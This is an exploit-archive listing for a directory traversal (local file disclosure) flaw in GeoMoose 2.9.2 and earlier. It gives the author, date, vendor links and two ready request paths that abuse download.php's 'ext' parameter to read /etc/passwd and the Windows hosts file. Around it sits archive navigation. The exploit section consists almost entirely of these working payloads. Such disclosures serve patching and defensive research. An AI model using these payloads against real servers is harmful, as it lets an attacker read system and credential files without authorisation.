GeoMoose 2.9.2 Directory Traversal

GeoMoose 2.9.2 Directory Traversal: Posted Apr 3, 2017; Authored by Sander Ferdinand; GeoMoose versions 2.9.2 and below suffer from a directory traversal vulnerability.; tags | exploit, file inclusion; SHA-256 | e8ffd351cb42c9c1aa1f94365a6e68fff547aebacc6c9e8b8dfc861633983dd6; Download | Favorite | View

GeoMoose 2.9.2 Directory Traversal

# Exploit Title: GeoMoose <= 2.9.2 Local File Disclosure
# Exploit Author: Sander 'dsc' Ferdinand
# Date: 2017-03-4
# Version: <= 2.9.2
# Blog: https://ced.pwned.systems/advisories-geomoose-local-file-disclosure-2-9-2.html
# Vendor Homepage: geomoose.org
# Reported: 4-3-2017
# Vendor response: http://osgeo-org.1560.x6.nabble.com/Geomoose-users-GeoMoose-Security-Issue-td5315873.html
# Software Link: https://github.com/geomoose/geomoose
# Tested on: Windows/Linux
# CVE : none
 
/php/download.php?id=foo/.&ext=/../../../../../../../etc/passwd
/php/download.php?id=foo/.&ext=/../../../../../../../WINDOWS/system32/drivers/etc/hosts

Top Authors In Last 30 Days

Red Hat 256 files
Ubuntu 87 files
Gentoo 31 files
Debian 19 files
tmrswrr 8 files
Sina Kheirkhah 7 files
Rodolfo Tavares 4 files
bRpsd 3 files
nu11secur1ty 3 files
h00die-gr3y 2 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,082)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,448)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,344)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,672)
UNIX (9,427)
UnixWare (187)
Windows (6,666)
Other

GeoMoose 2.9.2 Directory Traversal

GeoMoose 2.9.2 Directory Traversal

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

GeoMoose 2.9.2 Directory Traversal

Share This

GeoMoose 2.9.2 Directory Traversal

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems